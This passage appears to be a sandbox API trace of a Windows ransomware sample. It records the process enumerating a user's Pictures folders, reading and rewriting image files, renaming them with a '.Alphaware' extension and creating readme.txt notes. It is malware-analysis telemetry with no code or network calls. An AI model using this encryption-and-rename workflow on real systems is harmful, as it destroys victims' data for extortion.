lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.116] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.116] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.116] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.116] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.117] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.117] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.117] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.117] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.118] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0086.118] WriteFile (in: hFile=0x254, lpBuffer=0x246f2a0*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x246f2a0*, lpNumberOfBytesWritten=0x23e8b8*=0xc20, lpOverlapped=0x0) returned 1 [0086.118] CloseHandle (hObject=0x254) returned 1 [0086.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0086.120] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\v8u50bnoh.bmp"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52d2c890, ftCreationTime.dwHighDateTime=0x1d970fe, ftLastAccessTime.dwLowDateTime=0x81ba1820, ftLastAccessTime.dwHighDateTime=0x1d9711c, ftLastWriteTime.dwLowDateTime=0x8587e740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fc20)) returned 1 [0086.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0086.121] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\v8u50bnoh.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\V8U50BNOH.bmp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\v8u50bnoh.bmp.alphaware")) returned 1 [0086.123] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg", nBufferLength=0x105, lpBuffer=0x23e660, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg", lpFilePart=0x0) returned 0x3b [0086.124] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg", dwFileAttributes=0x80) returned 1 [0086.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0086.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\y252ztkpds.jpg"), fInfoLevelId=0x0, lpFileInformation=0x24707b0 | out: lpFileInformation=0x24707b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x33fc3cf0, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bb6e4e0, ftLastAccessTime.dwHighDateTime=0x1d97102, ftLastWriteTime.dwLowDateTime=0x2bb6e4e0, ftLastWriteTime.dwHighDateTime=0x1d97102, nFileSizeHigh=0x0, nFileSizeLow=0x1631b)) returned 1 [0086.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0086.124] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg", nBufferLength=0x105, lpBuffer=0x23e430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg", lpFilePart=0x0) returned 0x3b [0086.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0086.125] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\y252ztkpds.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.125] GetFileType (hFile=0x254) returned 0x1 [0086.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0086.125] GetFileType (hFile=0x254) returned 0x1 [0086.125] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x1631b [0086.125] ReadFile (in: hFile=0x254, lpBuffer=0x12736a38, nNumberOfBytesToRead=0x1631b, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x12736a38*, lpNumberOfBytesRead=0x23e9f8*=0x1631b, lpOverlapped=0x0) returned 1 [0086.126] CloseHandle (hObject=0x254) returned 1 [0086.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0086.154] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\y252ztkpds.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.155] GetFileType (hFile=0x254) returned 0x1 [0086.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0086.155] GetFileType (hFile=0x254) returned 0x1 [0086.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0086.159] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\y252ztkpds.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33fc3cf0, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bb6e4e0, ftLastAccessTime.dwHighDateTime=0x1d97102, ftLastWriteTime.dwLowDateTime=0x858caa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1da48)) returned 1 [0086.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0086.159] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\y252ztkpds.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\y252ZTKpdS.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\y252ztkpds.jpg.alphaware")) returned 1 [0086.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0086.159] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdd14fc0, ftCreationTime.dwHighDateTime=0x1d96f48, ftLastAccessTime.dwLowDateTime=0x858caa00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x858caa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd43b2920, ftCreationTime.dwHighDateTime=0x1d96728, ftLastAccessTime.dwLowDateTime=0x62d9f530, ftLastAccessTime.dwHighDateTime=0x1d96d9b, ftLastWriteTime.dwLowDateTime=0x62d9f530, ftLastWriteTime.dwHighDateTime=0x1d96d9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AZ80w8eAVF6qLdtcVJI", cAlternateFileName="AZ80W8~1")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9153ab40, ftCreationTime.dwHighDateTime=0x1d96e7c, ftLastAccessTime.dwLowDateTime=0xfba38500, ftLastAccessTime.dwHighDateTime=0x1d9722e, ftLastWriteTime.dwLowDateTime=0x85669400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12674, dwReserved0=0x0, dwReserved1=0x0, cFileName="E1l_XrQ6aMcGTT.bmp.Alphaware", cAlternateFileName="E1L_XR~1.ALP")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe481aa50, ftCreationTime.dwHighDateTime=0x1d9720b, ftLastAccessTime.dwLowDateTime=0x5ac001d0, ftLastAccessTime.dwHighDateTime=0x1d97324, ftLastWriteTime.dwLowDateTime=0x85701980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1bbf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlVaW3l8E0FMzi-R4q.gif.Alphaware", cAlternateFileName="MLVAW3~1.ALP")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0301a0, ftCreationTime.dwHighDateTime=0x1d966f6, ftLastAccessTime.dwLowDateTime=0x618e9fb0, ftLastAccessTime.dwHighDateTime=0x1d96e7b, ftLastWriteTime.dwLowDateTime=0x618e9fb0, ftLastWriteTime.dwHighDateTime=0x1d96e7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NQCf5ew", cAlternateFileName="")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfed4280, ftCreationTime.dwHighDateTime=0x1d96df6, ftLastAccessTime.dwLowDateTime=0x6378c160, ftLastAccessTime.dwHighDateTime=0x1d96f08, ftLastWriteTime.dwLowDateTime=0x6378c160, ftLastWriteTime.dwHighDateTime=0x1d96f08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NqR9nQMJn0 I", cAlternateFileName="NQR9NQ~1")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53081a00, ftCreationTime.dwHighDateTime=0x1d96635, ftLastAccessTime.dwLowDateTime=0xcac76500, ftLastAccessTime.dwHighDateTime=0x1d96775, ftLastWriteTime.dwLowDateTime=0xcac76500, ftLastWriteTime.dwHighDateTime=0x1d96775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oOpoFnm9s", cAlternateFileName="OOPOFN~1")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85669400, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85669400, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85669400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52d2c890, ftCreationTime.dwHighDateTime=0x1d970fe, ftLastAccessTime.dwLowDateTime=0x81ba1820, ftLastAccessTime.dwHighDateTime=0x1d9711c, ftLastWriteTime.dwLowDateTime=0x8587e740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fc20, dwReserved0=0x0, dwReserved1=0x0, cFileName="V8U50BNOH.bmp.Alphaware", cAlternateFileName="V8U50B~1.ALP")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33fc3cf0, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bb6e4e0, ftLastAccessTime.dwHighDateTime=0x1d97102, ftLastWriteTime.dwLowDateTime=0x858caa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1da48, dwReserved0=0x0, dwReserved1=0x0, cFileName="y252ZTKpdS.jpg.Alphaware", cAlternateFileName="Y252ZT~1.ALP")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33fc3cf0, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bb6e4e0, ftLastAccessTime.dwHighDateTime=0x1d97102, ftLastWriteTime.dwLowDateTime=0x858caa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1da48, dwReserved0=0x0, dwReserved1=0x0, cFileName="y252ZTKpdS.jpg.Alphaware", cAlternateFileName="Y252ZT~1.ALP")) returned 0 [0086.160] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0086.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0086.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.161] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd43b2920, ftCreationTime.dwHighDateTime=0x1d96728, ftLastAccessTime.dwLowDateTime=0x62d9f530, ftLastAccessTime.dwHighDateTime=0x1d96d9b, ftLastWriteTime.dwLowDateTime=0x62d9f530, ftLastWriteTime.dwHighDateTime=0x1d96d9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.161] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe97d1cb0, ftCreationTime.dwHighDateTime=0x1d970c1, ftLastAccessTime.dwLowDateTime=0xb1426890, ftLastAccessTime.dwHighDateTime=0x1d971bc, ftLastWriteTime.dwLowDateTime=0xb1426890, ftLastWriteTime.dwHighDateTime=0x1d971bc, nFileSizeHigh=0x0, nFileSizeLow=0x6242, dwReserved0=0x0, dwReserved1=0x0, cFileName="r5bauI Uaurz 0kBPe.jpg", cAlternateFileName="R5BAUI~1.JPG")) returned 1 [0086.161] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1446550, ftCreationTime.dwHighDateTime=0x1d972c3, ftLastAccessTime.dwLowDateTime=0x959b0770, ftLastAccessTime.dwHighDateTime=0x1d97557, ftLastWriteTime.dwLowDateTime=0x959b0770, ftLastWriteTime.dwHighDateTime=0x1d97557, nFileSizeHigh=0x0, nFileSizeLow=0xcd54, dwReserved0=0x0, dwReserved1=0x0, cFileName="uPx6uzdIPR.gif", cAlternateFileName="UPX6UZ~1.GIF")) returned 1 [0086.161] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e02460, ftCreationTime.dwHighDateTime=0x1d966bf, ftLastAccessTime.dwLowDateTime=0x65e77f50, ftLastAccessTime.dwHighDateTime=0x1d9751a, ftLastWriteTime.dwLowDateTime=0x65e77f50, ftLastWriteTime.dwHighDateTime=0x1d9751a, nFileSizeHigh=0x0, nFileSizeLow=0xe650, dwReserved0=0x0, dwReserved1=0x0, cFileName="zR 1JJINH15QPReboG.png", cAlternateFileName="ZR1JJI~1.PNG")) returned 1 [0086.161] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0086.161] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.162] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\r5bauI Uaurz 0kBPe.jpg", dwFileAttributes=0x80) returned 1 [0086.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\r5bauI Uaurz 0kBPe.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\r5baui uaurz 0kbpe.jpg"), fInfoLevelId=0x0, lpFileInformation=0x24eee70 | out: lpFileInformation=0x24eee70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe97d1cb0, ftCreationTime.dwHighDateTime=0x1d970c1, ftLastAccessTime.dwLowDateTime=0xb1426890, ftLastAccessTime.dwHighDateTime=0x1d971bc, ftLastWriteTime.dwLowDateTime=0xb1426890, ftLastWriteTime.dwHighDateTime=0x1d971bc, nFileSizeHigh=0x0, nFileSizeLow=0x6242)) returned 1 [0086.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.163] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\r5bauI Uaurz 0kBPe.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\r5baui uaurz 0kbpe.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.163] GetFileType (hFile=0x254) returned 0x1 [0086.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.163] GetFileType (hFile=0x254) returned 0x1 [0086.163] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x6242 [0086.164] ReadFile (in: hFile=0x254, lpBuffer=0x24ef178, nNumberOfBytesToRead=0x6242, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24ef178*, lpNumberOfBytesRead=0x23e958*=0x6242, lpOverlapped=0x0) returned 1 [0086.165] CloseHandle (hObject=0x254) returned 1 [0086.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.185] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\r5bauI Uaurz 0kBPe.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\r5baui uaurz 0kbpe.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.186] GetFileType (hFile=0x254) returned 0x1 [0086.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.186] GetFileType (hFile=0x254) returned 0x1 [0086.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.188] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\r5bauI Uaurz 0kBPe.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\r5baui uaurz 0kbpe.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe97d1cb0, ftCreationTime.dwHighDateTime=0x1d970c1, ftLastAccessTime.dwLowDateTime=0xb1426890, ftLastAccessTime.dwHighDateTime=0x1d971bc, ftLastWriteTime.dwLowDateTime=0x85916cc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x83e0)) returned 1 [0086.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.188] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\r5bauI Uaurz 0kBPe.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\r5baui uaurz 0kbpe.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\r5bauI Uaurz 0kBPe.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\r5baui uaurz 0kbpe.jpg.alphaware")) returned 1 [0086.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0086.189] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.189] GetFileType (hFile=0x254) returned 0x1 [0086.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0086.189] GetFileType (hFile=0x254) returned 0x1 [0086.191] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\uPx6uzdIPR.gif", dwFileAttributes=0x80) returned 1 [0086.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.191] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\uPx6uzdIPR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\upx6uzdipr.gif"), fInfoLevelId=0x0, lpFileInformation=0x25b6958 | out: lpFileInformation=0x25b6958*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1446550, ftCreationTime.dwHighDateTime=0x1d972c3, ftLastAccessTime.dwLowDateTime=0x959b0770, ftLastAccessTime.dwHighDateTime=0x1d97557, ftLastWriteTime.dwLowDateTime=0x959b0770, ftLastWriteTime.dwHighDateTime=0x1d97557, nFileSizeHigh=0x0, nFileSizeLow=0xcd54)) returned 1 [0086.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.191] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\uPx6uzdIPR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\upx6uzdipr.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.191] GetFileType (hFile=0x254) returned 0x1 [0086.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.191] GetFileType (hFile=0x254) returned 0x1 [0086.192] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) 